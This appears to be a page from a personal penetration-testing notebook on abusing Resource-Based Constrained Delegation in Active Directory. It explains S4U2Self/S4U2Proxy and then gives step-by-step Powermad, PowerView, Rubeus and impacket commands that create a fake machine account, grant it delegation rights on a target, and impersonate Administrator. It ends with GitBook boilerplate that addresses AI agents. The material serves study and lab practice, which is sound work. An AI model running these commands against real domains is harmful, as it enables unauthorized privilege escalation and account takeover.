> For the complete documentation index, see [llms.txt](https://venator17.gitbook.io/bibliotheque/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://venator17.gitbook.io/bibliotheque/active-directory/movement/kerberos/rbcd.md). # RBCD ## ABOUT **RBCD** is a **Windows Active Directory mechanism** where a computer object specifies which accounts are allowed to impersonate users to it, for constrained **(limited)** network-based delegation using Kerberos. > Attackers exploit it by inserting themselves into that trust list and impersonating any user. **"Resource-Based"** means the permission is set on the target machine, not on the impersonating account. **"Constrained"** means the impersonation is limited to specific services, like SMB or LDAP, not all services. **"Delegation"** means one account can act as another user across the network, not just locally. RBCD allows a computer or service account to say, **"this other account is allowed to act as any user when connecting to me."** Attackers abuse it by **creating their own computer account**, then **writing their own SID into the delegation attribute** on a target machine. After that, they can impersonate any domain user, like Administrator, to that target. > So basically it is crippled version of full impersonation, which is good, considering rule of least privilege. {% hint style="info" %} ### Example of Implementation A user logs into a web application using a standard web form. The web server needs to query a backend SQL database as that user, but does not have the user's password. **S4U2Self** allows the web server to forge a Kerberos ticket for the user to itself. **S4U2Proxy** allows the web server to exchange that forged self-ticket for a valid service ticket to the SQL database. {% endhint %} ## S4U2Self + S4U2Proxy **S4U2Self** and **S4U2Proxy** are **Kerberos protocol extensions**, not standalone attack techniques. They were designed by Microsoft as part of **Service-for-User (S4U)** functionality to support **constrained delegation**. Their purpose is to let services act on behalf of users under strict control. #### **S4U2Self** = **"Service For User To Self"** Lets a service request a ticket for any user to itself, without needing the user's password. ***"Give me\*\*\*\* ****SERVICE**** ****ticket**** ****FOR**** ****other**** ****USER**** ****so I can use it**** ****TO**** ****my****SELF****"*** #### **S4U2Proxy** = **"Service For User To Proxy"** Lets the service use that ticket to request a second ticket to another service, completing delegation. ***"Take this\*\*\*\* ****SERVICE**** ****Ticket**** ****from**** ****this**** ****USER**** ****I just got, and let me**** ****TO PROXY**** \*\*\*\*this user's access to that other service"*** ## REQUIREMENTS | Element | Value | | --------------------- | ----------------------------------- | | Domain User | | | Fake Machine Account | FAKE01$ | | Fake Machine Password | 123456 | | Fake Machine SID | *To be retrieved during attack* | | Target Machine | WS01 | | Target Admin | Administrator | | Domain Controller | DC01 | | Delegation Permission | Write access to WS01 RBCD attribute | ## FLOW 1. Create a fake machine account (**FAKE01$**), if `MachineAccountQuota` allows it. 2. Add **FAKE01$** SID to the **`msDS-AllowedToActOnBehalfOfOtherIdentity`** attribute on the target machine **WS01**, granting delegation rights. 3. Authenticate as **FAKE01$** and request a Kerberos ticket as Administrator to **FAKE01** (**S4U2Self**). 4. Use that ticket to request a second ticket as Administrator to **WS01** (**S4U2Proxy**). 5. Receive a valid service ticket for Administrator to **WS01** and use it to access **WS01** as Administrator, achieving privilege escalation. {% hint style="info" %} It's not necessary to create a fake account, sometimes it's better to give some machine account we have access to a delegation rights, or don't if we already have access to. The possibilities are vast, the only thing you need to undertand is components we need for attack. {% endhint %} ## WINDOWS #### 1. Creating Machine Object > For this we need PowerMAD script [**\[LINK\]**](https://github.com/Kevin-Robertson/Powermad) ```powershell PS C:\> New-MachineAccount -MachineAccount FAKE01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose ``` #### Checking Object + Taking it's SID ```powershell PS C:\> Get-DomainComputer fake01 ``` #### 2. Creating Security Descriptor for FAKE01 ```powershell $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-2552734371-813931464-1050690807-1154)" $SDBytes = New-Object byte[] ($SD.BinaryLength) $SD.GetBinaryForm($SDBytes, 0) ``` #### 3. Adding Descriptor bytes into WS01 (Service Machine) ```bash Get-DomainComputer ws01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose ``` #### Checking Descriptor ```powershell PS C:\> (New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0).DiscretionaryAcl ``` #### 4. Generating RC4 Hash for FAKE01 ```powershell .\Rubeus.exe hash /password:123456 /user:FAKE01$ /domain:militech.local ``` #### 5. Impersonating ```powershell .\Rubeus.exe s4u /user:fake01$ /rc4:3SAOIDFHOQWEB1O82G3O123KBSND /impersonateuser:Administrator /msdsspn:cifs/ws01.militech.local /ptt ``` #### Base64 Ticket to Ccache ticket ```bash base64 -d ticket_bash64.txt > ticket.kirbi impacket-ticketConverter ticket.kirbi ticket.ccache export KRB5CCNAME=/home/v17/tickets/ticket.ccache klist ``` ## RESOURCES {% embed url="" %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://venator17.gitbook.io/bibliotheque/active-directory/movement/kerberos/rbcd.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.